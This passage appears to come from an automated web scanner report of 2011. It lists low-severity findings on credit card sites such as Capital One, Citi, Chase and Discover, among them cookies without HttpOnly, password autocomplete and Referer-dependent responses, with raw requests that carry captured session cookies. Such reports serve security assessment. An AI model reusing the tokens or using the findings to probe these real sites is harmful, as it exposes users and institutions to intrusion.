Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/media/graphic_logo/global/button/action-oversized-apply-now.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=CA5579C54B3656E9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.66. http://www.capitalone.com/media/graphic_logo/small_business/card_art/card_art_sb_venture_v.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/media/graphic_logo/small_business/card_art/card_art_sb_venture_v.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=CA8592065BB2D7FA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.67. https://www.citicards.com/cards/acq/TimeOut.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.citicards.com
Path:	/cards/acq/TimeOut.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACQHSIDKEY=HSID4T3ZJ3000; Path=/; Domain=www.citicards.com; Secure

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cards/acq/TimeOut.do?ACQHSIDKEY=HSID4T3ZJ3000 HTTP/1.1
Host: www.citicards.com
Connection: keep-alive
Referer: https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529043&ProspectID=36CEB96C744948E481109575676DCE63
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HSID4T3VJ3000=kTjaTGnJbsaejkJUEjjpcU; VISITOR=1308312791632; HSID4T3ZJ3000=vqPrL3WjoMdXwjrs5f4CZU; HSID4DNZJ3000=pLRZjGMdgv4wCXc5EpZAFs; siteId=CB; Channel=CONSUMER_UNSOL; LangId=EN; DecisionMethod=02; ProspectID=C626E9F2656E4606A21348462D13F6BA; CARDS_LOCALE=en; ACQHSIDKEY=HSID4DNZJ3000; JSESSIONID=00007gBbtH4r9cLIjAgDf1NVx27:gtcardsrmi10crd; s_pers=%20gpv_p7%3DCitibank%2520Online%2520Consumer%2520Card%2520-%2520Enter%2520Information%7C1308315857466%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: ""
Date: Fri, 17 Jun 2011 12:43:30 GMT
Content-type: text/html; charset=ISO-8859-1
X-ua-compatible: IE=EmulateIE7
Cache-control: no-cache
Pragma: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: private
Cache-control: no-store
Cache-control: max-stale=0
Cache-control: must-revalidate
Cache-control: max-age=0
Cache-control: proxy-revalidate
Cache-control: s-max-age=0
Content-language: en-US
Set-cookie: ACQHSIDKEY=HSID4T3ZJ3000; Path=/; Domain=www.citicards.com; Secure
Vary: accept-encoding
Content-Length: 19071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

...[SNIP]...

10.68. http://www.creditcards.com/oc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:58:57 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oc/?pid=22105561&pg=17&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:57 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=1&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706585712817512&data3=0&sid=1889&c=22105561
Vary: Accept-Encoding
Content-Length: 3101
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:58:57 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...

10.69. http://www.creditcards.com/sb.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/sb.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CCsCookieimp=1308311915; expires=Mon, 14-Jun-2021 11:58:35 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sb.php?a_aid=999&a_bid=36 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/points-rewards.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308311486

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:35 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Set-Cookie: CCsCookieimp=1308311915; expires=Mon, 14-Jun-2021 11:58:35 GMT; path=/
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Pragma: no-cache

10.70. https://www.discovercard.com/cardmembersvcs/registration/reg/goto previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/cardmembersvcs/registration/reg/goto

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wfs=workflow.pwdreset=continue;Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.71. http://www.wtp101.com/bk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/bk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b; path=/; expires=Sun, 16 Jun 2013 12:12:23 GMT; domain=.wtp101.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.72. https://www262.americanexpress.com/business-card-application/simplycash-business-credit-card/apply/42732-9-0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www262.americanexpress.com
Path:	/business-card-application/simplycash-business-credit-card/apply/42732-9-0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26FDA14A051D10C8-4000012AC0103AC7[CE]; Expires=Wed, 15 Jun 2016 12:06:48 GMT; Path=/; Domain=.americanexpress.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.73. https://www262.americanexpress.com/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www262.americanexpress.com
Path:	/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26FDA14A051D10C8-4000012AC0103AC7[CE]; Expires=Wed, 15 Jun 2016 12:03:57 GMT; Path=/; Domain=.americanexpress.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11. Password field with autocomplete enabled previous next
There are 2 instances of this issue:

https://applynowdc1.chase.com/FlexAppWeb/renderApp.do
https://creditcards.citi.com/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

11.1. https://applynowdc1.chase.com/FlexAppWeb/renderApp.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://applynowdc1.chase.com
Path:	/FlexAppWeb/renderApp.do

Issue detail

The page contains a form with the following action URL:

https://applynowdc1.chase.com/FlexAppWeb/verifyApp.do

The form contains the following password fields with autocomplete enabled:

usr_password_input
usr_password_input1

Request

GET /FlexAppWeb/renderApp.do?SPID=DF92&CELL=6H8X&AFFID=EhraRx8K_BE-rs08mTiqNvJG3ktOS3.NLg&pvid=1118b79220110c061317070b00ed04 HTTP/1.1
Host: applynowdc1.chase.com
Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22125109&pg=17&pgpos=9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; FlexSessionID=Yqv1N71Nh3KMpxQ41JvJFjTwbJczJGSSL2pQthy2QY1JRMTy16LF!-1254913621

Response

11.2. https://creditcards.citi.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://creditcards.citi.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://creditcards.citi.com/

The form contains the following password field with autocomplete enabled:

PASSWORD

Request

GET / HTTP/1.1
Host: creditcards.citi.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 66519
Content-Type: text/html; charset=utf-8
Expires: -1
Date: Fri, 17 Jun 2011 12:44:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="ctl0
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/" id="aspnetForm">
<div>
...[SNIP]...
</strong><input id="pw" class="login-text" tabindex="2" name="PASSWORD" maxlength="32" type="password" /> </div>
...[SNIP]...

12. Source code disclosure previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://blogs.creditcards.com
Path:	/s_code.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /s_code.js HTTP/1.1
Host: blogs.creditcards.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311932226%27%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:54 GMT
Server: Apache
Last-Modified: Fri, 16 May 2008 19:22:40 GMT
ETag: "e79c2-4d5e-44d5deff5c000"
Accept-Ranges: bytes
Content-Length: 19806
Content-Type: application/javascript

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
P
...[SNIP]...
Number of days to expiration - 0 for session
* Returns:
* v or ''
*
* TEST CASES:
* 1. Page A: s.campaign="123"
* 2. Page A: s.campaign=s.getValOnce(s.campaign,"cname",0)
* 3. Page B: s.campaign="<?= isset($_GET['a_aid']) ? $_GET['a_aid'] : 0;?>-<?= isset($_GET['a_bid']) ? $_GET['a_bid'] : 0;?>-<?= isset($_GET['a_cid']) ? $_GET['a_cid'] : 0;?>-<?= isset($_GET['a_did']) ? $_GET['a_did'] : 0;?>" (cookie value is not overwritten)
* 4. Page A: (user clicks "back") s.campaign="<?= isset($_GET['a_aid']) ? $_GET['a_aid'] : 0;?>-<?= isset($_GET['a_bid']) ? $_GET['a_bid'] : 0;?>-<?= isset($_GET['a_cid']) ? $_GET['a_cid'] : 0;?>-<?= isset($_GET['a_did']) ? $_GET['a_did'] : 0;?>"
* This will de-inflate click-throughs due to back button
*********************************************************************/

/*
* Plugin: getValOnce 0.2 - get a value once per session or number
...[SNIP]...

13. Referer-dependent response previous next
There are 2 instances of this issue:

https://applynowdc1.chase.com/FlexAppWeb/renderApp.do
https://www.citicards.com/ServerError.html

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

13.1. https://applynowdc1.chase.com/FlexAppWeb/renderApp.do previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://applynowdc1.chase.com
Path:	/FlexAppWeb/renderApp.do

Request 1

Response 1

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Fri, 17 Jun 2011 12:06:40 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-cache,no-store,max-age=0
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 271358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3
...[SNIP]...
       }
   }

   function createOfferIDCookie(offerID)
   {

       var msc = "999999999999999";
       var cell = "6H8X";
       var tagId = "null";
       var pvid="1118b79220110c061317070b00ed04";
       var referer="www.creditcards.com%2Foc%2F%3Fpid%3D22125109%26pg%3D17%26pgpos%3D9";
       var cigAppId="20110617_9505985_4";


       //Set the expiry time to 8 mins
       //8 * 1000 * 60 minutes
       var exp = new Date();
       exp.setTime(exp.getTime() + 480000);
       setCookie("OFFER_ID", offerID, exp, "/", ".chase.com", "true");
       setCookie("DC_MSC",msc, exp, "/", ".chase.com", "true");
       setCookie("DC_CELL",cell, exp, "/", ".chase.com", "true");
       setCookie("DC_tagid",tagId, exp, "/", ".chase.com", "true");
       setCookie("DC_pvid",pvid, exp, "/", ".chase.com", "true");
       setCookie("DC_Referer",referer, exp, "/", ".chase.com", "true");
       setCookie("DC_cig_app_id",cigAppId, exp, "/", ".chase.com", "true");


   }

   function validateAndSubmitFrame()
   {
       reTryCount++;
        try
        {

           var offerID = "DF92";
           document.forms[0].auth_userId.value = _userId.toLowerCase();
           document.forms[0].auth_passwd.value = _password.toLowerCase();
           document.forms[0].auth_deviceId.value = deviceId();
           document.forms[0].auth_deviceSignature.value = deviceSignature();
           document.forms[0].auth_deviceCookie.value=deviceCookie();

           document.forms[0].method="post";
           document.forms[0].action="https://mfasa.chase.com/auth/fcc/login";

           /*
            * Before submitting the username / password to the GatewayUI for authentication,
            * create the URL_PARAMETERS_COOKIE and OFFER_ID cookie. And clean up the existing
            * ACTION_PREFILL_OBJECT_NAME object from UserScopeObject.
            */
           createUrlParameterCookie();
           createOfferIDCookie(offerID);

           document.forms[0].auth_externalData.value="LOB=FlexApp&FlexAppId=" + offerID;

           document.forms[0].submit();
       }
       catch(e)
       {
           if(reTryCount >= _maxReTryCount)
           {
               window.location.href="/wl_timeout_splash.html?fromLogon";
           }
           else
           {
               setTimeout("validateAndSubmitFrame()",_reTryInterval);
           }
    }
   }
</script>
<script type="text/javascript" language="javascript">
   fun
...[SNIP]...

Request 2

GET /FlexAppWeb/renderApp.do?SPID=DF92&CELL=6H8X&AFFID=EhraRx8K_BE-rs08mTiqNvJG3ktOS3.NLg&pvid=1118b79220110c061317070b00ed04 HTTP/1.1
Host: applynowdc1.chase.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; FlexSessionID=Yqv1N71Nh3KMpxQ41JvJFjTwbJczJGSSL2pQthy2QY1JRMTy16LF!-1254913621

Response 2

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Fri, 17 Jun 2011 12:07:00 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-cache,no-store,max-age=0
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 271234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3
...[SNIP]...
       }
   }

   function createOfferIDCookie(offerID)
   {

       var msc = "999999999999999";
       var cell = "6H8X";
       var tagId = "null";
       var pvid="1118b79220110c061317070b00ed04";
       var referer="";
       var cigAppId="20110617_9506017_22";


       //Set the expiry time to 8 mins
       //8 * 1000 * 60 minutes
       var exp = new Date();
       exp.setTime(exp.getTime() + 480000);
       setCookie("OFFER_ID", offerID, exp, "/", ".chase.com", "true");
       setCookie("DC_MSC",msc, exp, "/", ".chase.com", "true");
       setCookie("DC_CELL",cell, exp, "/", ".chase.com", "true");
       setCookie("DC_tagid",tagId, exp, "/", ".chase.com", "true");
       setCookie("DC_pvid",pvid, exp, "/", ".chase.com", "true");
       setCookie("DC_Referer",referer, exp, "/", ".chase.com", "true");
       setCookie("DC_cig_app_id",cigAppId, exp, "/", ".chase.com", "true");


   }

   function validateAndSubmitFrame()
   {
       reTryCount++;
        try
        {

           var offerID = "DF92";
           document.forms[0].auth_userId.value = _userId.toLowerCase();
           document.forms[0].auth_passwd.value = _password.toLowerCase();
           document.forms[0].auth_deviceId.value = deviceId();
           document.forms[0].auth_deviceSignature.value = deviceSignature();
           document.forms[0].auth_deviceCookie.value=deviceCookie();

           document.forms[0].method="post";
           document.forms[0].action="https://mfasa.chase.com/auth/fcc/login";

           /*
            * Before submitting the username / password to the GatewayUI for authentication,
            * create the URL_PARAMETERS_COOKIE and OFFER_ID cookie. And clean up the existing
            * ACTION_PREFILL_OBJECT_NAME object from UserScopeObject.
            */
           createUrlParameterCookie();
           createOfferIDCookie(offerID);

           document.forms[0].auth_externalData.value="LOB=FlexApp&FlexAppId=" + offerID;

           document.forms[0].submit();
       }
       catch(e)
       {
           if(reTryCount >= _maxReTryCount)
           {
               window.location.href="/wl_timeout_splash.html?fromLogon";
           }
           else
           {
               setTimeout("validateAndSubmitFrame()",_reTryInterval);
           }
    }
   }
</script>
<script type="text/javascript" language="javascript">
   function showHideUserNamePwdSection(d) {
       if(navigator.appName.ind
...[SNIP]...

13.2. https://www.citicards.com/ServerError.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.citicards.com
Path:	/ServerError.html

Request 1

GET /ServerError.html?ts=1308314058155 HTTP/1.1
Host: www.citicards.com
Connection: keep-alive
Referer: https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529047&ProspectID=36CEB96C744948E481109575676DCE63
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HSID4T3VJ3000=kTjaTGnJbsaejkJUEjjpcU; VISITOR=1308312791632; HSID4T3ZJ3000=vqPrL3WjoMdXwjrs5f4CZU; HSID4DNZJ3000=pLRZjGMdgv4wCXc5EpZAFs; siteId=CB; Channel=CONSUMER_UNSOL; LangId=EN; DecisionMethod=02; ProspectID=C626E9F2656E4606A21348462D13F6BA; CARDS_LOCALE=en; ACQHSIDKEY=HSID4DNZJ3000; JSESSIONID=00007gBbtH4r9cLIjAgDf1NVx27:gtcardsrmi10crd; s_pers=%20gpv_p7%3DCitibank%2520Online%2520Consumer%2520Card%2520-%2520Enter%2520Information%7C1308315857466%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 404 Not found
Server: ""
Date: Fri, 17 Jun 2011 12:34:19 GMT
Content-type: text/html
Vary: accept-encoding
Content-Length: 560

<HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=ISO-8859-1"><TITLE>Not Found</TITLE></HEAD>
<H1>Not Found</H1> The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you have it. Please inform the site administrator of the <A HREF="https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&STRIPPED&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529047&ProspectID=36CEB96C744948E481109575676DCE63">referring page</A>.

Request 2

GET /ServerError.html?ts=1308314058155 HTTP/1.1
Host: www.citicards.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HSID4T3VJ3000=kTjaTGnJbsaejkJUEjjpcU; VISITOR=1308312791632; HSID4T3ZJ3000=vqPrL3WjoMdXwjrs5f4CZU; HSID4DNZJ3000=pLRZjGMdgv4wCXc5EpZAFs; siteId=CB; Channel=CONSUMER_UNSOL; LangId=EN; DecisionMethod=02; ProspectID=C626E9F2656E4606A21348462D13F6BA; CARDS_LOCALE=en; ACQHSIDKEY=HSID4DNZJ3000; JSESSIONID=00007gBbtH4r9cLIjAgDf1NVx27:gtcardsrmi10crd; s_pers=%20gpv_p7%3DCitibank%2520Online%2520Consumer%2520Card%2520-%2520Enter%2520Information%7C1308315857466%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 404 Not found
Server: ""
Date: Fri, 17 Jun 2011 12:34:27 GMT
Content-type: text/html
Vary: accept-encoding
Content-Length: 292

<HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=ISO-8859-1"><TITLE>Not Found</TITLE></HEAD>
<H1>Not Found</H1> The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you have it.

14. Cross-domain POST previous next
There are 11 instances of this issue:

http://blogs.creditcards.com/
http://blogs.creditcards.com/fine-print/
https://online.citibank.com/US/JRS/portal/prefillApps.do
https://online.citibank.com/US/JRS/portal/prefillApps.do
https://online.citibank.com/US/JRS/portal/prefillApps.do
https://online.citibank.com/US/JRS/portal/prefillApps.do
http://www.discovercard.com/discover/jscripts/onlineopinionF3r/oo_engine_c.js
https://www.discovercard.com/scripts/optimized/vendor-ac-global-bottom.js
https://www.discovercard.com/scripts/optimized/vendor-ac-global-bottom.js
https://www.discovercard.com/scripts/optimized/vendor-dc-global-bottom.js
https://www.discovercard.com/scripts/optimized/vendor-dc-global-bottom.js

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

14.1. http://blogs.creditcards.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.creditcards.com
Path:	/

Issue detail

